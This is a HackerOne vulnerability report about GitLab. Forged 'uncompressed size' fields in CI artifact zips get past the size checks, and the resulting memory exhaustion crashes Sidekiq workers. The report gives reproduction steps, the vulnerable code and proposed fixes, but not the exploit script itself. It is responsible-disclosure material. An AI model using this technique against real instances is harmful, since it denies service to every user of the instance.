Sidekiq background job DoS by uploading malicious CI job artifact zips

HackerOne report #1736230 by luryus on 2022-10-15, assigned to @nmalcolm:

Report

Summary

Very similar issue to report #1716296.

An attacker can upload a crafted CI job artifact zip file in a project that uses dynamic child pipelines and make a sidekiq job try to allocate up to 5 gigabytes of memory. When Sidekiq is memory-limited, as it usually is due to it being run in a memory-limited container or just the system not having that much memory, this will likely cause the Linux kernel to OOMKill sidekiq. In small (self-hosted) Gitlab environments, where there's only a single Sidekiq node, this will cause some background jobs to fail and their execution will get delayed. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause minor denial of service.

By altering the "uncompressed size" metadata entries in the artifact zip file, the attacker can bypass size limitations that are supposed to prevent this kind of excessive memory use. When reading the artifact file for the dynamic child pipeline feature, a background job checks that both the archive zip file itself and the reported uncompressed size of the pipeline yaml file inside it are under 5 megabytes. A 5 gigabyte empty file compresses into a 5 megabyte zip file, and by altering the metadata this kind of a file can be made to pass the size checks.

Because the attacker only needs to upload a single, small (a few megabyte) file to achieve this, it's difficult or impossible to mitigate this with rate limits. This attack can be repeated as frequently as the attacker can create pipelines, and therefore the attacker can continuously cause crashes.

Compared to my previous report (#1716296) where a very similar issue exists in Nuget package uploads, this one is a tiny bit more limited because the zip file size limit is smaller (5 megabytes) and that limits the actual uncompressed size that the attacker can use to about 5 gigabytes. However, that is enough to crash a typical sidekiq instance; for example gitlab.com seems to have the Sidekiq node memory limits set to 3-6 gigs (https://gitlab.com/gitlab-com/gl-infra/k8s-workloads/gitlab-com/-/blob/master/releases/gitlab/values/gprd.yaml.gotmpl#L772)

Steps to reproduce

In your own Gitlab instance, import the attached project.
Go to the project CI settings and configure a Docker-based Gitlab runner for it.
Monitor the sidekiq processes in the Gitlab instance with, for example, these tools:

htop for general system memory usage and processes
tail -f path/to/sidekiq/logs for monitoring sidekiq working (exact log file path depends on the installation)
dmesg -T -w for kernel logs (OOMKill logs end up here)

In the imported Gitlab project, go to CI/CD -> Pipelines, click "Run pipeline", and create a new pipeline for the main branch
The gen-config CI job will create the payload zip file and upload it. Sidekiq will crash soon after, when it tries to read the large 5 gigabyte file from the zip.

Impact

An attacker can get a sidekiq worker OOMKilled by a simple CI job file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.

This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.

Examples

Example project attached. The project includes these files:

artifacts.zip: a normal zip file where an empty 5 gigabyte file has been zipped. This is a completely normal file, no metadata changes have been made to it.
alter.py: a Python script that rewrites the "uncompressed size" metadata entries in the zip file
.gitlab-ci.yml: pipeline configuration that will reproduce the issue

A demo video where I reproduce this in my own Gitlab instance is also attached.

What is the current bug behavior?

In Gitlab::Ci::ArtifactFileReader the yaml file size is validated by checking the total_size property of the artifact metadata entry:

        metadata_entry = job.artifacts_metadata_entry(path)

        if metadata_entry.total_size > MAX_ARCHIVE_SIZE  
          raise Error, "Artifacts archive for job `#{job.name}` is too large: max #{max_archive_size_in_mb}"  
        end

That metadata entry seems to be created by Gitlab Workhorse when uploading the artifact, and it uses the uncompressed size field from the zip file metadata. The attacker can freely set the value of this field, and therefore the size check can be effectively bypassed.

ArtifactFileReader then proceeds to extract the file from the zip archive, without any additional size check. zip_file.read will try to buffer the 5 gigabyte file into memory, which it can't do before Linux's OOMKiller kills the sidekiq process.

What is the expected correct behavior?

ArtifactFileReader should limit the amount of data read from the zip file to avoid excessive memory use.

Note that rubyzip explicitly states that when using read, the size checks have to be included (https://github.com/rubyzip/rubyzip#size-validation):

Note that if you use the lower level Zip::InputStream interface, rubyzip does not check the entry sizes. In this case, the caller is responsible for making sure it does not read more data than expected from the input stream.

Relevant logs and/or screenshots

See the attached video file, it includes logs.

Output of checks

Not tested on Gitlab.com, but this can have at least some effect there.

Results of GitLab environment info

Docker installation:

###  gitlab-rake gitlab:env:info

System information  
System:  
Proxy:          no  
Current User:   git  
Using RVM:      no  
Ruby Version:   2.7.5p203  
Gem Version:    3.1.6  
Bundler Version:2.3.15  
Rake Version:   13.0.6  
Redis Version:  6.2.7  
Sidekiq Version:6.4.2  
Go Version:     unknown

GitLab information  
Version:        15.4.2-ee  
Revision:       4eacd5378ab  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.6  
URL:            http://gl.lkoskela.com:8929  
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git  
SSH Clone URL:  ssh://git@gl.lkoskela.com:2224/some-group/some-project.git  
Elasticsearch:  no  
Geo:            no  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers: 

GitLab Shell  
Version:        14.10.0  
Repository storage paths:  
- default:      /var/opt/gitlab/git-data/repositories  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell

Impact

An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.

The severity of this depends on the sidekiq setup: with larger and more distributed instances it will of course be smaller as crashes are limited to only a subset of sidekiq instances. In small self-hosted environments though this can have a large impact on the functionality of Gitlab.

This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. Background job execution may get delayed or in some cases they may not get executed at all (if attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Proposal

Since ArtifactFileReader uses the Zip::File#read interface that uses Zip::InputStream internally, it does not validate the actual uncompressed size against the reported uncompressed size in the header.

In comparison, the Zip::Entry#extract method validates the actual size that have been extracted and written and raises an error if it exceeds the size stated in the header.

As suggested in https://github.com/rubyzip/rubyzip#size-validation, the caller ArtifactFileReader needs to ensure that it does not read more than the size stated in the header.

Note that if you use the lower level Zip::InputStream interface, rubyzip does not check the entry sizes. In this case, the caller is responsible for making sure it does not read more data than expected from the input stream.

An alternative is to use Zip::File#get_input_stream.

Edited Nov 15, 2022 by Albert